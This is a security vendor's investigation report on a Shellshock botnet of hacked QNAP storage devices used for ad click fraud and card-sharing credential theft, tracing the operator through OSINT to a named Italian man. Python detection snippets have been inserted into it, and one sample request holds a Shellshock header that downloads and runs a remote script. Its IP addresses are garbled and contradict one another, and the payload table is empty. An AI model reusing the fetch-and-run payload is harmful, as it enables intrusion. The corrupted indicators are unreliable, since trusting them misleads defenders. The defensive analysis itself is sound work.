On June 18th, 2016, Fabio Gasperini, an Italian national, was arrested in Amsterdam, Netherlands, at the request of the United States Department of Justice, accused of creating a global botnet of hacked QNAP Network Attached Storage devices with the ultimate motivation of performing advertisement click fraud. In a trial which concluded on August 4th, 2017, Fabio Gasperini was found guilty of computer intrusion. The trial is the conclusion of an investigation which first began in December 2014.
In this report we cover how Forkbombus Labs' Learned Dynamic Deception technology, Hivemind, first discovered the alleged activity, how we identified the click-fraud motivation behind these attacks, and the ultimate discovery of the botmaster, Fabio Gasperini.
The Initial Exploitation Activity
On December 5th, 2014, Hivemind alerted our analysts to new Shellshock (CVE-2014-6271) activity originating from a QNAP Network Attached Storage device located in Spain (Figure 1).
Exploited QNAP devices were then instructed to download and execute a bash script from one of numerous identified sources. Over the course of our investigation, we identified 10 distinct Shellshock payloads related to the botnet (Figure 2).
|Payload|Count|First Seen (EST)|Last Seen (EST)|
|---|---|---|---|
| |2,511|2014-12-06 02:13:41|2015-03-13 14:54:54|
| |600|2014-12-05 10:15:04|2015-03-13 11:01:29|
| |286|2014-12-17 17:18:20|2015-03-12 17:23:38|
| |125|2014-12-07 09:12:31|2015-03-07 18:27:28|
| |95|2014-12-28 04:35:02|2015-03-05 05:33:55|
| |77|2014-12-14 02:09:00|2015-02-04 21:47:37|
| |40|2015-01-06 13:17:16|2015-03-09 02:32:43|
| |5|2014-12-18 09:48:53|2015-02-02 22:03:24|
| |1|2014-12-08 14:03:00|2014-12-08 14:03:00|
| |1|2014-12-22 18:56:43|2014-12-22 18:56:43|
Figure 2. Table highlighting the details of observed Shellshock payloads
The Shellshock payloads instructed the devices to download 8 distinct URLs.
With the exception of the URLs ending in io.php, these files configured the QNAP devices to download further resources, join the botnet, and engage in further worm-type propagation. These S0 scripts additionally served several other purposes (Figures 3 through 8).
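The following is an added detection example, not code from the report or from Forkbombus Labs: it checks the headers of an HTTP request for the Shellshock function-definition pattern described above and pulls out the stage-0 script URLs the injected command fetches, which is what a defender would log and pivot on. The request, the documentation-range addresses and the S0.sh path are constructed sample input.

```python
import re
from typing import Dict, List, Optional

# Shellshock (CVE-2014-6271): bash imports functions from environment
# variables whose value starts with "() {", and executes anything that
# follows the closing brace. Servers that copy HTTP headers into a CGI
# environment therefore run attacker commands placed in a header.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;(?P<cmd>.*)")
URL_RE = re.compile(r"https?://[^\s'\";|&]+")

def parse_header_line(line: str) -> Optional[tuple]:
    """Split 'Name: value' into (name, value); request lines give None."""
    name, sep, value = line.partition(":")
    return (name.strip(), value.strip()) if sep else None

def detect_shellshock(header_lines: List[str]) -> Optional[Dict[str, object]]:
    """Return a finding for the first header carrying a Shellshock payload:
    the header name, the injected command and the URLs it fetches (the
    stage-0 script locations an analyst would pivot on)."""
    for line in header_lines:
        parsed = parse_header_line(line)
        if not parsed:
            continue
        name, value = parsed
        m = SHELLSHOCK_RE.search(value)
        if m:
            cmd = m.group("cmd").strip()
            return {"header": name, "command": cmd, "urls": URL_RE.findall(cmd)}
    return None

# Constructed sample request modelled on the stage-0 pattern the report
# describes (fetch a script, then run it); addresses are documentation
# ranges, not the botnet's real infrastructure.
SAMPLE_REQUEST = [
    "GET /cgi-bin/index.cgi HTTP/1.1",
    "Host: 192.0.2.10",
    "User-Agent: () { :; }; /bin/bash -c 'wget -O /tmp/S0.sh "
    "http://203.0.113.5/S0.sh; sh /tmp/S0.sh'",
    "Accept: */*",
]
BENIGN_REQUEST = ["GET / HTTP/1.1", "Host: 192.0.2.10", "User-Agent: Mozilla/5.0"]

if __name__ == "__main__":
    print(detect_shellshock(SAMPLE_REQUEST))   # flagged, with the S0.sh URL
    print(detect_shellshock(BENIGN_REQUEST))   # None
```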
Lightaidra IRC Bot
Figure 6 above shows the botnet's installation script downloading a Lightaidra IRC Bot binary and configuring the QNAP device to run the binary on startup. Examining this binary gives us some initial clues.
$ sha256sum ..32
fe18e7a49018ef331819bb8eae2961fa36ac099933d5a34a5f53c9c61b79e14c  ..32
$ md5sum ..32
dc2f1b4cb4a348c6f9abe598e72c486b  ..32
Hash values of the 32-bit Lightaidra IRC Bot binary
Running strings on the binary reveals that it is configured to connect to an IRC server located at 188.8.131.52 over port 6667 and join the channel #aidra (Figure 9).
The string UPX! is also observed several times, indicating the file has been packed with the UPX packer. Unpacking the ..32 file with UPX proves successful.
$ upx-ucl -d ..32
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     48318 <-     21872   45.27%   netbsd/elf386   ..32

Unpacked 1 file.
Unpacking the ..32 Lightaidra IRC Bot binary
The unpacked binary now reveals several strings of interest. The Lightaidra IRC Bot binary attempts to retrieve its public IP address by accessing http://ip.betfair2.eu/ip, located at the 184.108.40.206 address (Figure 10). Notably, the betfair2.eu domain appears to be a reference to the Betfair online casino.
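As an added triage example (not the report's own tooling), the script below automates the two steps just described: it checks a sample for the UPX! marker and extracts printable strings, then pulls out the IRC indicators an analyst pivots on (server address and port, channel, and any URL such as the public-IP lookup). The byte blob is a constructed stand-in for a bot image and its addresses are documentation values, not the real C2.

```python
import re
from typing import Dict, List

UPX_MARKER = b"UPX!"

def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Like `strings`: runs of printable ASCII at least min_len long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]

def is_upx_packed(data: bytes) -> bool:
    """UPX leaves its 'UPX!' magic in the packed file, which is what the
    report saw several times in the sample. A missing marker does not
    prove the file is unpacked; the marker is trivially stripped."""
    return UPX_MARKER in data

IPV4_PORT_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})(?::(\d{1,5}))?\b")
CHANNEL_RE = re.compile(r"(?<![\w/])#[A-Za-z][\w-]{1,31}")
URL_RE = re.compile(r"https?://[\w.-]+(?:/[\w./-]*)?")

def irc_indicators(strings: List[str]) -> Dict[str, List[str]]:
    """Collect what an analyst pivots on for an IRC bot: C2 addresses
    (with port when written as ip:port), channel names and any URL the
    bot uses, e.g. the public-IP lookup the report describes."""
    found: Dict[str, List[str]] = {"servers": [], "channels": [], "urls": []}
    for s in strings:
        for ip, port in IPV4_PORT_RE.findall(s):
            if all(int(octet) <= 255 for octet in ip.split(".")):
                found["servers"].append(f"{ip}:{port}" if port else ip)
        found["channels"].extend(CHANNEL_RE.findall(s))
        found["urls"].extend(URL_RE.findall(s))
    return found

def triage(data: bytes) -> Dict[str, object]:
    report: Dict[str, object] = {"upx_packed": is_upx_packed(data)}
    report.update(irc_indicators(extract_strings(data)))
    return report

# Constructed stand-in for a bot image: binary filler around the kinds of
# strings the report lists (server, port, channel, IP-lookup URL). The
# addresses are documentation values, not the real C2.
SAMPLE = (b"\x7fELF\x01\x01\x01" + b"\x00" * 8
          + b"NICK %s\x00JOIN #aidra\x00198.51.100.7:6667\x00"
          + b"http://ip.example.invalid/ip\x00\x01\x02UPX!\x03")

if __name__ == "__main__":
    print(triage(SAMPLE))
```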
The 220.127.116.11 host was observed in the most prolific Shellshock payload. Research of this host reveals it was leased by UAServers. Performing a PTR record lookup for the 18.104.22.168 host revealed the domain name gaspolo.uaservers.net (Figure 11). At the time, UAServers was known to register PTR records containing their clients' usernames for the leased hosts, suggesting gaspolo is the username of the server's renter.
In addition to the most prolific http://22.214.171.124/S0.sh script, another script (http://126.96.36.199/S00.sh) was observed a single time, on December 8th, 2014, sourcing from the residential Italian IP address 188.8.131.52. While largely performing the same activity highlighted above in Figures 3 through 8, this script also downloads two further resources, including 184.108.40.206/cl (Figure 12).
The http://220.127.116.11/cl file is another Bash shell script. Its purpose is to identify CCcam card-sharing credentials and exfiltrate them to a script hosted at ppoolloo.altervista.org (Figure 13).
The http://18.104.22.168/emme script is another Bash shell script. Its purpose is to fraudulently view advertisements served by the JuiceADV advertisement service. The script reveals the user's JuiceADV numeric user ID, and also the domain name sempreinformato.eu, which is meant to serve as the HTTP referrer of the visited advertisements. Part of this script retrieves a random HTTP User-Agent string from a script located at http://22.214.171.124/agent.php (Figure 14).
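The emme script's behaviour (a fixed referrer combined with a freshly randomized User-Agent on every view) is exactly the pattern an ad network can detect in its own logs. The following is an added example, not the report's or JuiceADV's code: it parses Apache combined-format impression logs and flags client IPs that present many distinct User-Agents behind one referrer within a short window. The log lines, the /ad path and the client addresses are constructed sample data; the thresholds are assumptions to tune per deployment.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# Apache "combined" format: client IP, timestamp, request, status, size,
# Referer, User-Agent. Only ip, ts, referer and ua are used below.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

def parse_line(line: str) -> Optional[Dict[str, object]]:
    m = LOG_RE.match(line)
    if not m:
        return None
    rec: Dict[str, object] = m.groupdict()
    rec["ts"] = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return rec

def flag_rotating_ua(lines: List[str], window_s: int = 600, min_hits: int = 5,
                     min_uas: int = 4) -> List[Tuple[str, str, int, int]]:
    """Group impressions by (client IP, Referer). A browser keeps one
    User-Agent for a session; a script that pulls a fresh random UA for
    every view behind one fixed referrer shows many distinct UAs from
    one IP in a short span. Returns (ip, referer, hits, distinct_uas)."""
    groups: Dict[Tuple[str, str], List[Tuple[datetime, str]]] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            groups[(rec["ip"], rec["referer"])].append((rec["ts"], rec["ua"]))
    flagged = []
    for (ip, ref), events in groups.items():
        events.sort()
        span = (events[-1][0] - events[0][0]).total_seconds()
        uas = {ua for _, ua in events}
        if span <= window_s and len(events) >= min_hits and len(uas) >= min_uas:
            flagged.append((ip, ref, len(events), len(uas)))
    return flagged

# Constructed sample impressions (not real ad-server logs): one client
# rotates its UA behind the fixed referrer, the other is a normal visitor.
_R = '"GET /ad HTTP/1.1" 200 512 "http://sempreinformato.eu/"'
SAMPLE_LOG = [
    f'198.51.100.9 - - [08/Dec/2014:14:03:00 -0500] {_R} "Mozilla/5.0 (Windows NT 6.1)"',
    f'198.51.100.9 - - [08/Dec/2014:14:03:41 -0500] {_R} "Mozilla/5.0 (Macintosh)"',
    f'198.51.100.9 - - [08/Dec/2014:14:04:12 -0500] {_R} "Opera/9.80 (X11; Linux)"',
    f'198.51.100.9 - - [08/Dec/2014:14:05:03 -0500] {_R} "Mozilla/5.0 (Linux; Android)"',
    f'198.51.100.9 - - [08/Dec/2014:14:05:50 -0500] {_R} "Mozilla/4.0 (compatible; MSIE 8.0)"',
    '203.0.113.4 - - [08/Dec/2014:14:04:30 -0500] "GET /ad HTTP/1.1" 200 512 '
    '"http://example.com/news" "Mozilla/5.0 (Windows NT 6.1)"',
]
```

Running `flag_rotating_ua(SAMPLE_LOG)` reports only the rotating client; a single IP that legitimately serves many users (a carrier NAT) will also trip this, so the referrer and UA-fetch timing should be weighed alongside it.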
The 126.96.36.199 host is the same one used to retrieve a bot's public IP address, as detailed above in the Lightaidra IRC Bot section.
The sempreinformato.eu domain name was observed as the referrer for advertisements which the botnet fraudulently viewed. “Sempre Informato” roughly translates from Italian to English as “Always Informed”, supporting an Italian theme. The sempreinformato.eu site is reportedly registered to a user with the e-mail [email protected] (Figure 15). Note the email [email protected], which matches the formerly discovered subdomain from the
The Italian host 188.8.131.52 was observed once by Hivemind, on December 8th, 2014. According to an nmap scan performed on December 21st, the IP does not appear to host any services (Figure 16).
This host was observed scanning with the S00.sh propagation script, which, unlike the rest of the observed propagation scripts, contains references to a domain name registered to a citizen of Rome. These facts make it likely that the 184.108.40.206 host was in use by the attacker at the time of the attacks, and is not itself a separate compromised host.
[email protected] Email Address
The Google account Gaspolo was retrieved from the whois record of the SempreInformato.eu website. The Gaspolo alias matches the subdomain retrieved from the PTR record of the heavily utilized 220.127.116.11 asset. Initiating a Google Account recovery process for the [email protected] account reveals the owner is named “Fabio Gasperini” (Figure 17).
Performing a Google search for [email protected] revealed several links, including several blogspot.com blogs Fabio has authored regarding video game hacking (particularly Facebook games such as “Pet Society”), in which he guides his readers on how to cheat and “hack” these games. The search also reveals mailing list results from as early as 2005 regarding system administration.
Fabio “Gaspolo” Gasperini
Performing a Google search for “Fabio Gaspolo Gasperini” reveals a Facebook post by Fabio Gasperini on November 15th, 2009, in which he promotes his (now defunct) website gaspolo.it on a Facebook page titled “Pet Society tips, Tricks and Cheats” (Figure 18). Further, Fabio lists himself as living in Centocelle, Lazio, Italy, which is a district of Rome (Figure 19).
Tying It All Together
Through our research, we have been able to identify over 2,500 distinct hosts involved in this activity. The most prolific host used in the propagation of botnet resources, 18.104.22.168, gives us our first clue as to the botmaster's identity: the nickname Gaspolo. Analyzing the retrieved IRC bot binary reveals other related indicators, such as the 22.214.171.124 IP address. While monitoring for related activity, Hivemind was able to identify the lone S00.sh attempt, which offers direct insight into the attacker's advertisement fraud and card-sharing credential theft motivations.
The advertisement fraud provides our first real glimpse of the attacker. It also gives the first indication that the party responsible for the infrastructure and propagation of the botnet is the same individual who is profiting from the advertisement fraud: Gaspolo. Exploring information related to the uncovered Gaspolo identities reveals his true identity as Fabio Gasperini, a citizen of Rome, Italy.
While the botnet was observed propagating in a worm fashion, the exploit attempt which most strongly leads to identifying the attacker as Fabio Gasperini sources from a residential Italian connection which did not present itself as a QNAP NAS (or any particular) device. Furthermore, resources used in the advertisement fraud were also used in the IRC bot propagation. This shared resource is linked to betfair2.eu, potentially related to the European gambling website Betfair, which is later correlated with Bleeping Computer's article describing Fabio's employment with an online gambling website.
Hivemind Intelligent Deception
Hivemind is Forkbombus Labs' patent-pending A.I.-driven deception technology. Standard honeypots and deception technologies imitate a predetermined service or environment. This becomes problematic because attackers' capabilities and interests often differ from what static deceptions offer. Even when attackers stumble upon static honeypots, they often overlook them in favor of different scenarios. When attackers fail to engage with deception technologies, defenders fail to gain the valuable intelligence that enables intelligent responses to attacks.
As Hivemind learns an attacker's capabilities and motivations, Hivemind sensors instantly alter their appearance to each attacker to emulate what they are most likely to interact with. Hivemind ensures attackers are more likely to engage Hivemind sensors, leading attackers to divulge as much information as possible about themselves and their intentions. This enhanced collection capability enables defenders to rapidly detect attackers' resources, motivations, and identities, allowing defenders to respond to threats more quickly and intelligently than before. Attackers that engage with Hivemind increase their own costs while saving defenders time and money.
The information in this article is provided as is and without warranty and does not represent professional advice or services.
Forkbombus Labs is not responsible for any loss or damages from actions taken based on information within this publication.
In the interest of saving space and protecting non-suspect identities, some images may be redacted or cropped. Forkbombus Labs asserts that no provided evidence has been altered or misrepresented, and only non-contributing information has been redacted.
While all information represented in this document is believed to be accurate, Forkbombus Labs and any contributing entities are not responsible or liable for repercussions from the use or misuse of any information provided throughout this document, or in any resulting correspondence related to this document. Receiving parties are responsible for independently verifying the information outlined in this document.